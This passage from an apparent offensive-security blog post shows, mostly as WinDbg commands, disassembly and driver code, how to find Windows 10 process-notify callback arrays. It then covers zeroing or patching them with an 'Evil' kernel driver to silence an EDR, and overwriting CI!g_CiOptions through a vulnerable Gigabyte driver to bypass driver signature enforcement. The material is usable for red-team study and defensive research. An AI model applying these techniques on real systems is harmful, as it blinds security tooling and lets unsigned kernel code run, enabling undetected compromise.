1: kd> .load pykd 1: kd> !py C:\Users\rui\desktop\tools\windbg-scripts\psnotifycallbacks.py
Here’s the output of its execution on my system.
SwishDbgExt
You can also use the SwishDbgExt WinDbg extension, which is pretty cool and will give you way more information. Just use the command !ms_callbacks
, see below.
If you fancy colours and buttons, use windbg
instead of kd
as above.
The PspCreateProcessNotifyRoutine array
The scripts above are all cool and pretty, but let’s see how to find this information “manually” without the help of these scripts. I advise you to read the code of the scripts above, because in the end what we’ll do step by step here, is what the scripts are doing with some extra lifting and error handling. We are going through this “manually” mainly because you’ll need to understand it if you later want to modify the source code of the Evil.sys
kernel driver (that we’ll talk about further down).
In this walkthrough, we’ll be using, as mentioned already, Windows 10 x64 1903 19H1 (OS Build 18362.592). I won’t mention 32-bit systems or other Windows versions below 10. You can look at them yourself if you like. I can tell you in advance that the process to identify these global arrays ( PspCreateProcessNotifyRoutine
, and PspCreateThreadNotifyRoutine
) is easier.
We start by disassembling the function PsSetCreateProcessNotifyRoutine
.
0: kd> u nt!PsSetCreateProcessNotifyRoutine nt!PsSetCreateProcessNotifyRoutine: fffff800`26f48b60 4883ec28 sub rsp,28h fffff800`26f48b64 8ac2 mov al,dl fffff800`26f48b66 33d2 xor edx,edx fffff800`26f48b68 84c0 test al,al fffff800`26f48b6a 0f95c2 setne dl fffff800`26f48b6d e80e010000 call nt!PspSetCreateProcessNotifyRoutine (fffff800`26f48c80) fffff800`26f48b72 4883c428 add rsp,28h fffff800`26f48b76 c3 ret
Above, we can get the address of the function PspSetCreateProcessNotifyRoutine
. So we disassemble it too.
0: kd> u nt!PspSetCreateProcessNotifyRoutine nt!PspSetCreateProcessNotifyRoutine: fffff800`26f48c80 48895c2408 mov qword ptr [rsp+8],rbx fffff800`26f48c85 48896c2410 mov qword ptr [rsp+10h],rbp fffff800`26f48c8a 4889742418 mov qword ptr [rsp+18h],rsi fffff800`26f48c8f 57 push rdi fffff800`26f48c90 4154 push r12 fffff800`26f48c92 4155 push r13 fffff800`26f48c94 4156 push r14 fffff800`26f48c96 4157 push r15 0: kd> u nt!PspSetCreateProcessNotifyRoutine+0x18: fffff800`26f48c98 4883ec20 sub rsp,20h fffff800`26f48c9c 8bf2 mov esi,edx fffff800`26f48c9e 8bda mov ebx,edx fffff800`26f48ca0 83e602 and esi,2 fffff800`26f48ca3 4c8bf1 mov r14,rcx fffff800`26f48ca6 f6c201 test dl,1 fffff800`26f48ca9 0f8591520c00 jne nt!PspSetCreateProcessNotifyRoutine+0xc52c0 (fffff800`2700df40) fffff800`26f48caf 85f6 test esi,esi 0: kd> u nt!PspSetCreateProcessNotifyRoutine+0x31: fffff800`26f48cb1 0f848c000000 je nt!PspSetCreateProcessNotifyRoutine+0xc3 (fffff800`26f48d43) fffff800`26f48cb7 ba20000000 mov edx,20h fffff800`26f48cbc e89f82a3ff call nt!MmVerifyCallbackFunctionCheckFlags (fffff800`26980f60) fffff800`26f48cc1 85c0 test eax,eax fffff800`26f48cc3 0f843a530c00 je nt!PspSetCreateProcessNotifyRoutine+0xc5383 (fffff800`2700e003) fffff800`26f48cc9 488bd3 mov rdx,rbx fffff800`26f48ccc 498bce mov rcx,r14 fffff800`26f48ccf e8a4000000 call nt!ExAllocateCallBack (fffff800`26f48d78) 0: kd> u nt!PspSetCreateProcessNotifyRoutine+0x54: fffff800`26f48cd4 488bf8 mov rdi,rax fffff800`26f48cd7 4885c0 test rax,rax fffff800`26f48cda 0f842d530c00 je nt!PspSetCreateProcessNotifyRoutine+0xc538d (fffff800`2700e00d) fffff800`26f48ce0 33db xor ebx,ebx fffff800`26f48ce2 4c8d2d77d3dbff lea r13,[nt!PspCreateProcessNotifyRoutine (fffff800`26d06060)] fffff800`26f48ce9 488d0cdd00000000 lea rcx,[rbx*8] fffff800`26f48cf1 4533c0 xor r8d,r8d fffff800`26f48cf4 4903cd add rcx,r13
Once we see the lea instruction for the first time we found the global array we are interested in ( PspCreateProcessNotifyRoutine
). In this Windows version, the address is loaded into the register R13
. If you look into other Windows versions you can see it being loaded into R14
, R15
, or others. The same goes for the initial call
that led us to the PspSetCreateProcessNotifyRoutine
. In some Windows versions, you might find a jmp
instead. We’ll need to handle these cases in our Evil
driver.
Note: Since these are only a few opcodes we need to parse to find the instructions we are interested in, doing it manually it’s ok. If you want to do it properly look at Capstone or Zydis .
If we now display the contents of the array…
0: kd> dqs fffff800`26d06060 fffff800`26d06060 ffffcd0b`e2c5024f fffff800`26d06068 ffffcd0b`e2dea2af fffff800`26d06070 ffffcd0b`e486525f fffff800`26d06078 ffffcd0b`e4865c1f fffff800`26d06080 ffffcd0b`e486ccff fffff800`26d06088 ffffcd0b`e486caef fffff800`26d06090 ffffcd0b`e486d59f fffff800`26d06098 ffffcd0b`e7722c1f fffff800`26d060a0 ffffcd0b`e772696f fffff800`26d060a8 ffffcd0b`e9e8a1cf fffff800`26d060b0 00000000`00000000 fffff800`26d060b8 00000000`00000000
Hmm, no symbols resolution? To get the actual address of the notification routines we need to AND
the values we have in the array with 0xFFFFFFFFFFFFFFF8
. For example, for the last value of the array:
0: kd> dps (ffffcd0b`e9e8a1cf & FFFFFFFFFFFFFFF8) L1 ffffcd0b`e9e8a1c8 fffff800`2c821720 edr!OnProcessNotify [c:\users\rui\source\repos\edr\edr\edr.cpp @ 158]
For now, that’s all we need to know. We’ll talk about these “signatures”, that we have to parse in our Evil driver to find the kernel structures we are interested, further down.
The PspCreateThreadNotifyRoutine array
The process to find the PspCreateThreadNotifyRoutine
is pretty much the same as for PspCreateProcessNotifyRoutine
. Since our proof-of-concept Evil driver doesn’t care about threads I’ll just list here the kd
output for the same Windows version as described above.
0: kd> u nt!PsSetCreateThreadNotifyRoutine nt!PsSetCreateThreadNotifyRoutine: fffff806`4c748940 4883ec28 sub rsp,28h fffff806`4c748944 33d2 xor edx,edx fffff806`4c748946 e865000000 call nt!PspSetCreateThreadNotifyRoutine (fffff806`4c7489b0) fffff806`4c74894b 4883c428 add rsp,28h fffff806`4c74894f c3 ret fffff806`4c748950 cc int 3 fffff806`4c748951 cc int 3 fffff806`4c748952 cc int 3 0: kd> u nt!PspSetCreateThreadNotifyRoutine nt!PspSetCreateThreadNotifyRoutine: fffff806`4c7489b0 48895c2408 mov qword ptr [rsp+8],rbx fffff806`4c7489b5 4889742410 mov qword ptr [rsp+10h],rsi fffff806`4c7489ba 57 push rdi fffff806`4c7489bb 4883ec20 sub rsp,20h fffff806`4c7489bf 8bf2 mov esi,edx fffff806`4c7489c1 8bd2 mov edx,edx fffff806`4c7489c3 e8b0030000 call nt!ExAllocateCallBack (fffff806`4c748d78) fffff806`4c7489c8 488bf8 mov rdi,rax 0: kd> u nt!PspSetCreateThreadNotifyRoutine+0x1b: fffff806`4c7489cb 4885c0 test rax,rax fffff806`4c7489ce 0f840e550c00 je nt!PspSetCreateThreadNotifyRoutine+0xc5532 (fffff806`4c80dee2) fffff806`4c7489d4 33db xor ebx,ebx fffff806`4c7489d6 488d0d83d2dbff lea rcx,[nt!PspCreateThreadNotifyRoutine (fffff806`4c505c60)] fffff806`4c7489dd 4533c0 xor r8d,r8d fffff806`4c7489e0 488d0cd9 lea rcx,[rcx+rbx*8] fffff806`4c7489e4 488bd7 mov rdx,rdi fffff806`4c7489e7 e8b084a3ff call nt!ExCompareExchangeCallBack (fffff806`4c180e9c)
We decode the function addresses the same way.
0: kd> dqs fffff806`4c505c60 fffff806`4c505c60 ffff8882`ac745c8f fffff806`4c505c68 ffff8882`ac702a0f fffff806`4c505c70 00000000`00000000 fffff806`4c505c78 00000000`00000000 (...) 0: kd> dps (ffff8882`ac702a0f & FFFFFFFFFFFFFFF8) L1 ffff8882`ac702a08 fffff806`52481a20 edr!OnThreadNotify
As I said in the beginning, and as you can see, all these Ps notify callbacks “work” more or less the same way.
Evil Kernel Mode Driver
What’s this Evil
kernel driver about after all? We asked ourselves before what happens if we zero out these global arrays where the addresses of our notification callbacks are stored. Also, we said that if we can set notification callbacks we can also unset them. Right?
Right. We can simply try it with the debugger. We don’t need to write a kernel driver to find out. For example, if we want to zero out the entry for our EDR we can simply do:
0: kd> dqs fffff800`26d06060 fffff800`26d06060 ffffcd0b`e2c5024f fffff800`26d06068 ffffcd0b`e2dea2af fffff800`26d06070 ffffcd0b`e486525f fffff800`26d06078 ffffcd0b`e4865c1f fffff800`26d06080 ffffcd0b`e486ccff fffff800`26d06088 ffffcd0b`e486caef fffff800`26d06090 ffffcd0b`e486d59f fffff800`26d06098 ffffcd0b`e7722c1f fffff800`26d060a0 ffffcd0b`e772696f fffff800`26d060a8 ffffcd0b`e9e8a1cf fffff800`26d060b0 00000000`00000000 0: kd> eq fffff800`26d060a8 0 0: kd> dqs fffff800`26d06060 fffff800`26d06060 ffffcd0b`e2c5024f fffff800`26d06068 ffffcd0b`e2dea2af fffff800`26d06070 ffffcd0b`e486525f fffff800`26d06078 ffffcd0b`e4865c1f fffff800`26d06080 ffffcd0b`e486ccff fffff800`26d06088 ffffcd0b`e486caef fffff800`26d06090 ffffcd0b`e486d59f fffff800`26d06098 ffffcd0b`e7722c1f fffff800`26d060a0 ffffcd0b`e772696f fffff800`26d060a8 00000000`00000000 fffff800`26d060b0 00000000`00000000
As simple as that. And from now on… our EDR won’t receive anymore process creation/termination notifications. From an attacker perspective, using kd
is not realistic in an attack scenario for many obvious reasons.
What if we have a kernel driver that does exactly this for us, and few other things more? Let’s see what’s this Evil
driver is about. Build the driver with Debug mode enabled, load it with sc.exe
, and run its user-mode client too to find out which options are available.
sc create evil type= kernel binPath= c:\users\rui\desktop\evil.sys sc start evil
As we can see from above, there are multiple things we can do with the Evil
driver user-mode client.
kd
These “special” modes are just parody, but let’s go through each one of them.
First, we use our Evil
driver user-mode client to list all the process creation/termination notification callbacks registered in the system.
How is this achieved? I use the AuxKlibQueryModuleInformation to retrieve information about all the image modules that the system has loaded. You can have a look at the function SearchModules
inside the evil.cpp
file. It’s a slightly modified version of the DisplayModules
function that you can find on the same file. You can also call this DisplayModules
function from the evilcli.exe
with the “undocumented” -m
switch.
NTSTATUS DisplayModules() { auto status = STATUS_SUCCESS; ULONG modulesSize; AUX_MODULE_EXTENDED_INFO* modules; ULONG numberOfModules, i; status = AuxKlibInitialize(); if (!NT_SUCCESS(status)) { KdPrint(("AuxKlibInitialize fail %d\n", status)); return status; } status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), NULL);// Get the required array size. if (!NT_SUCCESS(status) || modulesSize == 0) { return status; } numberOfModules = modulesSize / sizeof(AUX_MODULE_EXTENDED_INFO);// Calculate the number of modules. modules = (AUX_MODULE_EXTENDED_INFO*)ExAllocatePoolWithTag(PagedPool, modulesSize, DRIVER_TAG);// Allocate memory to receive data. if (modules == NULL) { status = STATUS_INSUFFICIENT_RESOURCES; return status; } RtlZeroMemory(modules, modulesSize); status = AuxKlibQueryModuleInformation(&modulesSize, sizeof(AUX_MODULE_EXTENDED_INFO), modules);// Obtain the module information. if (!NT_SUCCESS(status)) { ExFreePoolWithTag(modules, DRIVER_TAG); return status; } KdPrint(("[ # ] ImageBase\t\t\tImageSize\t\t\t\t\t\t FileName FullPathName\n")); for (i = 0; i < numberOfModules; i++) { KdPrint(("[%03d] %p\t", i, modules[i].BasicInfo.ImageBase)); // ImageBase KdPrint(("0x%08x\t", modules[i].ImageSize)); // ImageSize KdPrint(("%30s ", modules[i].FullPathName + modules[i].FileNameOffset)); // FileName KdPrint((" %s\n", modules[i].FullPathName)); // FullPathName } ExFreePoolWithTag(modules, DRIVER_TAG); return status; }
If you use the -m
switch ( evilcli.exe -m
) you won’t see the output in user-mode (there are other ways of getting the same information from a medium integrity process as we’ll see later). However, if you have your kernel debugger attached you’ll see the following.
This -m
switch is just for my own debugging. However, you can see that with this information at hand it’s trivial to find out at which module each one of the global array values belongs. Look at the SearchModules
function for details.
Let’s look at the -z
switch now. Zero out Process Notify Callback’s Array (Cowboy Mode) . Let’s start by locating the array, as we did before.
0: kd> u nt!PsSetCreateProcessNotifyRoutine nt!PsSetCreateProcessNotifyRoutine: fffff806`4c748b60 4883ec28 sub rsp,28h fffff806`4c748b64 8ac2 mov al,dl fffff806`4c748b66 33d2 xor edx,edx fffff806`4c748b68 84c0 test al,al fffff806`4c748b6a 0f95c2 setne dl fffff806`4c748b6d e80e010000 call nt!PspSetCreateProcessNotifyRoutine (fffff806`4c748c80) fffff806`4c748b72 4883c428 add rsp,28h fffff806`4c748b76 c3 ret 0: kd> u nt!PspSetCreateProcessNotifyRoutine nt!PspSetCreateProcessNotifyRoutine: fffff806`4c748c80 48895c2408 mov qword ptr [rsp+8],rbx fffff806`4c748c85 48896c2410 mov qword ptr [rsp+10h],rbp fffff806`4c748c8a 4889742418 mov qword ptr [rsp+18h],rsi fffff806`4c748c8f 57 push rdi fffff806`4c748c90 4154 push r12 fffff806`4c748c92 4155 push r13 fffff806`4c748c94 4156 push r14 fffff806`4c748c96 4157 push r15 0: kd> u nt!PspSetCreateProcessNotifyRoutine+0x18: fffff806`4c748c98 4883ec20 sub rsp,20h fffff806`4c748c9c 8bf2 mov esi,edx fffff806`4c748c9e 8bda mov ebx,edx fffff806`4c748ca0 83e602 and esi,2 fffff806`4c748ca3 4c8bf1 mov r14,rcx fffff806`4c748ca6 f6c201 test dl,1 fffff806`4c748ca9 0f8591520c00 jne nt!PspSetCreateProcessNotifyRoutine+0xc52c0 (fffff806`4c80df40) fffff806`4c748caf 85f6 test esi,esi 0: kd> u nt!PspSetCreateProcessNotifyRoutine+0x31: fffff806`4c748cb1 0f848c000000 je nt!PspSetCreateProcessNotifyRoutine+0xc3 (fffff806`4c748d43) fffff806`4c748cb7 ba20000000 mov edx,20h fffff806`4c748cbc e89f82a3ff call nt!MmVerifyCallbackFunctionCheckFlags (fffff806`4c180f60) fffff806`4c748cc1 85c0 test eax,eax fffff806`4c748cc3 0f843a530c00 je nt!PspSetCreateProcessNotifyRoutine+0xc5383 (fffff806`4c80e003) fffff806`4c748cc9 488bd3 mov rdx,rbx fffff806`4c748ccc 498bce mov rcx,r14 fffff806`4c748ccf e8a4000000 call nt!ExAllocateCallBack (fffff806`4c748d78) 0: kd> u nt!PspSetCreateProcessNotifyRoutine+0x54: fffff806`4c748cd4 488bf8 mov rdi,rax fffff806`4c748cd7 4885c0 test rax,rax fffff806`4c748cda 0f842d530c00 je nt!PspSetCreateProcessNotifyRoutine+0xc538d (fffff806`4c80e00d) fffff806`4c748ce0 33db xor ebx,ebx fffff806`4c748ce2 4c8d2d77d3dbff lea r13,[nt!PspCreateProcessNotifyRoutine (fffff806`4c506060)] fffff806`4c748ce9 488d0cdd00000000 lea rcx,[rbx*8] fffff806`4c748cf1 4533c0 xor r8d,r8d fffff806`4c748cf4 4903cd add rcx,r13 0: kd> dqs fffff806`4c506060 fffff806`4c506060 ffff8882`a7c5006f fffff806`4c506068 ffff8882`a7e640ff fffff806`4c506070 ffff8882`a9b8a73f fffff806`4c506078 ffff8882`a9b8aaff fffff806`4c506080 ffff8882`a9b91abf fffff806`4c506088 ffff8882`a9b91c9f fffff806`4c506090 ffff8882`a9b92b0f fffff806`4c506098 ffff8882`a9b9562f fffff806`4c5060a0 ffff8882`ac745d1f fffff806`4c5060a8 ffff8882`ac702d0f fffff806`4c5060b0 00000000`00000000 fffff806`4c5060b8 00000000`00000000 fffff806`4c5060c0 00000000`00000000 fffff806`4c5060c8 00000000`00000000 fffff806`4c5060d0 00000000`00000000 fffff806`4c5060d8 00000000`00000000
So we have our array at fffff8064c506060
. If we now run our evilclient.exe
with the -z
switch this array should be completely zero’ed out.
We should see the following in our debugger.
These are just debug messages, but it means basically that we successfully found what we were looking for. The logic is implemented in the function FindPspCreateProcessNotifyRoutine
, look at the source code. Again, if you want to do a proper job, use Capstone or Zydis as I mentioned before. For a few instructions like in this case, it is fine to parse the memory ourselves and search for the opcodes we are interested in.
Anyway, if we look at the array address again…
0: kd> dqs fffff806`4c506060 fffff806`4c506060 00000000`00000000 fffff806`4c506068 00000000`00000000 fffff806`4c506070 00000000`00000000 fffff806`4c506078 00000000`00000000 fffff806`4c506080 00000000`00000000 fffff806`4c506088 00000000`00000000 fffff806`4c506090 00000000`00000000 fffff806`4c506098 00000000`00000000 fffff806`4c5060a0 00000000`00000000 fffff806`4c5060a8 00000000`00000000 fffff806`4c5060b0 00000000`00000000 fffff806`4c5060b8 00000000`00000000 fffff806`4c5060c0 00000000`00000000 fffff806`4c5060c8 00000000`00000000 fffff806`4c5060d0 00000000`00000000 fffff806`4c5060d8 00000000`00000000
All zeros. This is quite intrusive and that’s why I called it Cowboy Mode . Don’t do this! All the other notification callbacks that were registered by other system components are gone. PatchGuard won’t complain, because Windows Defender ( WdFilter.sys
) is disabled in my system. Otherwise touching it would have consequences.
Note: If you want to know if PatchGuard will trigger after this change, you’ll need a different VM. PatchGuard will not run if kernel debugging is enabled .
Let’s now look at the second option, Delete Specific Process Notify Callback (Red Team Mode) . This is much lesser intrusive and probably aligns with your “mission”. Silence the EDR, while it still runs and everyone believes that everything is fine. So what’s the first thing to do? List all the process notify callbacks registered.
We locate our target, in this case [09] 0xfffff807027b1720 (edr.sys + 0x1720)
. We want to remove it because at the moment it is blocking our favourite h4x0r
tool ( injector.exe
).
Let’s use the -d
switch of our evilcli.exe
and the index of the EDR ( 09
as we can see above).
Let’s now list the registered callbacks again and see if our EDR is indeed gone, and we can run our favourite injector.exe
again.
We can. This is cool. However, what happens if you try to remove other registered callbacks? While you’ll succeed for most of them, it will fail for some others. For example, here’s what happens with CI.dll
:
That was unexpected, right? After all, this is ring0
vs ring0
. Well, I invite you to play a bit with this and figure out yourself why this happens. It’s not hard.
Before we answer the questions you may have at this moment, let’s look at the third option. Patch Specific Process Notify Callback (Threat Actor Mode) . Note that I didn’t use the words “Advanced” (Threat Actor Mode), or “State” (Actor Mode). Why? Bear with me for a moment.
This technique will simply patch the OnProcessNotify
function from our EDR. Which means, we won’t remove the callback. We’ll leave it there, but every time it is executed (a new notification arrives) it will simply return. How?
Let’s look at the code before we run our evilcli.exe
with the -p
option.
We have private symbols (that’s why I told you, in the beginning, to build the drivers with debug information), so we can simply do:
0: kd> u edr!OnProcessNotify edr!OnProcessNotify: fffff807`029f1720 4c89442418 mov qword ptr [rsp+18h],r8 fffff807`029f1725 4889542410 mov qword ptr [rsp+10h],rdx fffff807`029f172a 48894c2408 mov qword ptr [rsp+8],rcx fffff807`029f172f 56 push rsi fffff807`029f1730 57 push rdi fffff807`029f1731 4883ec78 sub rsp,78h fffff807`029f1735 4883bc24a000000000 cmp qword ptr [rsp+0A0h],0 fffff807`029f173e 0f8442020000 je edr!OnProcessNotify+0x266 (fffff807`029f1986) 0: kd>
These are the first assembly instructions of our OnProcessNotify
function (its address is fffff807029f1720
) that are going to be executed every time a new process is created or terminated. Basically, where we can act on it. Block it, modify it, let it run.
Now let’s run our evilcli.exe
with the -p
option, the index of our EDR driver, and then look at this function address again.
And if we disassemble the edr!OnProcessNotify
function again…
0: kd> u edr!OnProcessNotify edr!OnProcessNotify: fffff807`029f1720 c3 ret fffff807`029f1721 0000 add byte ptr [rax],al fffff807`029f1723 0000 add byte ptr [rax],al fffff807`029f1725 0000 add byte ptr [rax],al fffff807`029f1727 002410 add byte ptr [rax+rdx],ah fffff807`029f172a 48894c2408 mov qword ptr [rsp+8],rcx fffff807`029f172f 56 push rsi fffff807`029f1730 57 push rdi 0: kd>
What do we see now? A ret
instruction. Which means the EDR driver from now on will just not work as intended anymore. This trick is very intrusive, and it may bugcheck your system. If you didn’t get it yet, bugcheck is a different word for “blue screen”.
Why? The kernel page where the code from the edr!OnProcessNotify
function lives is read-only pages. To patch it we need to change the WP
(bit 16) - Write Protect bit - that inhibits supervisor-level procedures from writing into read-only pages. There are safe and unsafe ways of doing it. You can look at the code, but keep in mind that if you try to patch the code without changing the page WP
bit you’ll bugcheck the system. We need to clear this bit, which allows supervisor-level procedures to write into read-only pages (regardless of the U/S bit setting). However, if you change the page protection WP
bit through the Control Register CR0
, and don’t revert your changes, you’ll bugcheck the system. Why? PatchGuard. Also, a common error is that people will only change CR0
in one of the CPUs, forgetting that there’s a CR0
register per CPU. The theory behind safely applying these changes is quite long and I can’t/won’t cover it here. Research it properly if you want to know more. Or just look at the code, and assume that what I’m doing is correct. I can tell you that while it is safe what the code is doing, it is not the “best” way of doing it. The proper way is to use an MDL to map the memory you want to patch. In the project’s code, you can also find how to use an MDL if you don’t feel like looking at better sources than this project.
Now, the questions you may be asking yourself. What about anti-tampering? Aren’t EDRs, or AVs, checking if these callbacks are being zero’ed out, removed, or patched?
Probably they somehow should, right? The truth is… they aren’t. At least 90% of them aren’t. I only know one case that implements heavy anti-tampering checks. However, even this single case I’m aware is considering to remove most of its checks. Why? This is heavy. When you execute code on the kernel you don’t want to be wasting unnecessary CPU cycles. You don’t want to be checking regularly if your registered callback function address is still there. You need to find a balance. A better option is to use a timer, and if during a certain amount of time you don’t receive any notification than something is wrong. However, most of the software just assume it’s fine, no one is going to do this . And if they do, the system is already compromised so why care?
Driver Signature Enforcement Bypass
Driver Signature Enforcement (DSE) is a feature, introduced with Windows Vista x64, that blocks a kernel-mode driver from loading, even with Administrator privileges, unless signed with a valid digital signature. As stated by j00ru , for anyone actively working on its kernel security is that the Driver Signature Enforcement (DSE in short) is not effective and can be bypassed with relative ease by any determined individual.
Historically, this feature has been bypassed multiple times, in a multitude of ways. There’s was nice presentation at BlackHat 2018 by Joe Desimone and Gabriel Landau from Endgame , Kernel Mode Threats and Practical Defenses where you can find multiple examples. The most famous are probably Turla and Duqu 2.0 .
Anyway, DSE is enabled by default since Windows Vista for 64-bit versions. Any driver must be signed to be loaded, by a legitimate publisher. As we saw before, this feature can be disabled because forcing everyone to have signed drivers even during its development process doesn’t sound like a good idea. So, when we enable test signing mode a watermark is displayed on the bottom right corner as we saw before.
As we know, many high profile rootkits found their way into loading unsigned code into the kernel and even leverage kernel callbacks. Some examples are Mebroot, ZeroAccess, Rustock, Stuxnet, TDL3, Uroburos, Derusbi, Slingshot, and many others. So, how does the driver signing policy works? The best explanation I found was this blog post by j00ru : https://j00ru.vexillium.org/2010/06/insight-into-the-driver-signature-enforcement/
More precisely, the “Initialization” section. Where we can read: The actual heart of Code Integrity lies inside a single executable image, called CI.dll . And then he continues with: (…) the first function within our interest is the initialization routine, CI!CiInitialize. This routine is imported by the NT core (ntoskrnl.exe) and called during system initialization .
VOID SepInitializeCodeIntegrity() { DWORD CiOptions; g_CiEnabled = FALSE; if(!InitIsWinPEMode) g_CiEnabled = TRUE; memset(g_CiCallbacks,0,3*sizeof(SIZE_T)); CiOptions = 4|2; if(KeLoaderBlock) { if(*(DWORD*)(KeLoaderBlock+84)) { if(SepIsOptionPresent((KeLoaderBlock+84),L"DISABLE_INTEGRITY_CHECKS")) CiOptions = 0; if(SepIsOptionPresent((KeLoaderBlock+84),L"TESTSIGNING")) CiOptions |= 8; } CiInitialize(CiOptions,(KeLoaderBlock+32),&g_CiCallbacks); } }
The pseudocode above comes from the same post and presents the general idea of the SepInitializeCodeIntegrity routine. As can be seen, some global nt!g_CiEnabled variable is being set to FALSE / TRUE, depending on whether the machine is booting up in the WinPE mode. Furthermore, CiOptions is initialized accordingly to the system boot options and finally passed to the CiInitialize routine (…) .
Please read the whole post. However, the pseudocode above is enough for us to understand what’s going on and come up with a bypass ourselves. From above, we learned that the CiInitialize
function is located in the ci.dll
file. Its first argument, CiOptions
, contains the flags of the current signing policy. As we can see above, the default value of the flags ( CiOptions = 4|2;
) is 4 or 2. That is 0x6
in hexadecimal. Now, if the driver signing enforcement is disabled (as in test signing mode) the flags will be equal to 4 or 2 or 8. That is, 0xe
in hexadecimal.
So, what if we exploit a kernel vulnerability, or a vulnerable kernel driver, that allow us to write into kernel space? That’s what we’ll do next.
Note: there are some other really interesting projects, like this one , this one , this one , etc. that even load fileless drivers as shellcode decreasing its footprint and making these techniques way stealthier. Worth having a look.
If you dive into the underground of the Game Hacking Scene you’ll find plenty of vulnerable drivers being used to cheat and bypass AntiCheat technology. Some of the drivers being abused are a complete disaster and look more like backdoors than anything else. One well know driver was part of the game Street Fighter V , from Capcom . This driver only functionality is well described here . Basically, it would take a user pointer, disable SMEP , execute code at the pointer’s address, and enable SMEP again. According to Capcom, a “non-DRM anti-crack solution” . Right… Anyway, you may ask why are we talking about this driver? First, because it is widely known. Second, because this driver could potentially be abused to load our unsigned code in the kernel. However, this driver signature was revoked and the driver can’t be loaded anymore. It’s not very common, but it happens.
As a proof-of-concept we’ll use a driver, that’s vulnerable, but still (as of today) unrevoked. However, there are some remarks I would like to make before we proceed regarding loading drivers on Windows 10.
Note that Microsoft in April 2015 stated : with the release of Windows 10, all new Windows 10 kernel mode drivers must be submitted to and digitally signed by the Windows Hardware Developer Center Dashboard portal. Windows 10 will not load new kernel mode drivers which are not signed by the portal.
Additionally, starting 90 days after the release of Windows 10, the portal will only accept driver submissions, including both kernel and user mode driver submissions, that have a valid Extended Validation (“EV”) Code Signing Certificate.
This means that, unless UpgradedSystem
is set, if you enable Secure Boot you’ll “activate” the new 1607+ policy. As we can read from above, this policy requires Attestation Signed drivers, or WHQL drivers, for drivers signed after October 29th 2015.
Geoff Chappell can describe what a WHQL-signed driver is better than me. A WHQL-signed driver is signed with a certificate whose private key is kept by Microsoft so that only Microsoft can do the signing. WHQL means Windows Hardware Quality Labs. For many years the only way that Microsoft would sign a driver for an Independent Software Vendor (ISV) was if the driver was sent to Microsoft with a record of having passed an appropriate WHQL test suite. In those years, a WHQL signature gave some assurance of the driver’s quality.
For the many sorts of driver for which Microsoft had not yet devised tests for hardware compatibility, ISVs simply could not get WHQL signatures. Such drivers could instead be cross-signed by the ISV using both a Software Publisher Certificate (SPC) that is issued to the ISV by a third-party certification authority (CA) and a publicly available cross-certificate that Microsoft issues to the CA. In the particular way that Windows validates signatures on drivers, the signature on a cross-signed driver has a root certificate from Microsoft but it’s one that distinguishes the code verification as having been out-sourced. Microsoft’s involvement in cross-signing is only indirect, to vet CAs as having sufficiently high standards for authenticating that whoever they issue their certificates to is an identifiable (and hopefully responsible) software publisher. A cross-signature is some assurance that the driver, of whatever quality, is the work of a specific known entity.
Don’t forget to read the Exceptions
section, because as we can read here: https://docs.microsoft.com/en-gb/windows-hardware/drivers/install/kernel-mode-code-signing-policy–windows-vista-and-later-
However, cross-signed drivers are still permitted if any of the following are true :
- The PC was upgraded from an earlier release of Windows to Windows 10, version 1607. - Secure Boot is off in the BIOS. - Driver was signed with an end-entity certificate issued prior to July 29th 2015 that chains to a supported cross-signed CA.
I’ve never used the portal myself, so I can only document here what Microsoft’s documentation states. If you are interested, there’s a nice post here where Christoph Lüders describes his experience purchasing an Extended Validation Certificate, getting an account on the portal, and going through the attestation route. Very informative. Additionally, have a look at this video from channel9 .
Why is this important? Because the driver I chose is not WHQL signed . This means, if Secure Boot is enabled this GigaByte driver won’t load . Anyway, this driver serves our demo purpose perfectly.
The Gigabyte Driver
Microsoft has stated that a million unique driver hashes are seen through telemetry, monthly! . These drivers, many times, come with crazy functionalities exposed to user-mode. Plus, many other vulnerabilities. So, assuming that all the code that runs in ring0
is trusted is just a bad assumption as we’ll see.
The nday
I mentioned at the beginning of this post is this Gigabyte driver vulnerability . When I decided to choose a driver for this PoC, this driver immediately came to mind. The main reason, its hilarious report timeline.
I knew some of these Gigabyte drivers have been used by some gamers for cheating . And, based on the report timeline I also knew that these vulnerabilities are probably still unfixed as of today (I didn’t bother checking). What I knew was that these drivers weren’t revoked and can still be loaded in the latest Windows 10 x64, and consequently exploited.
If you read the SecureAuth’s Advisory , it seems there’s a party in ring0
and we are all invited, and especially welcome. Arbitrary ring0 VM read/write, Port mapped I/O access, MSR Register access, Arbitrary physical memory read/write . It’s hard to choose one, but we’ll go with the easiest one, that is the first one. We only need to write one single byte to achieve our goal.
As we saw before, we need to change CI!g_CiOptions
global variable value. But we don’t know what’s its address, right? Well yes, but any user can get it easily. From a medium integrity process (integrity level for most of the programs a normal user runs) it is trivial to get the address we are interested in. Which means Kernel ASLR (KASLR) has no power here.
So from a medium integrity process, we can just leak ci!CiInitialize
and CI!g_CiOptions
.
As I mentioned before, one byte write in Kernel space is enough to compromise the whole system. We learnt from SecureAuth’s Advisory that we can read and write arbitrary memory in ring0
. We don’t care about reading because we are exploiting this vulnerability from medium integrity. Otherwise, we could use the read to leak memory and bypass KASLR from a low integrity process.
Anyway, from a medium integrity process all we have to do is find the base address of CI.dll
(among others, this DLL main service is to verify the integrity of digitally signed drivers). Here’s the function that enumerates all system’s drivers and finds the base address we are interested in.
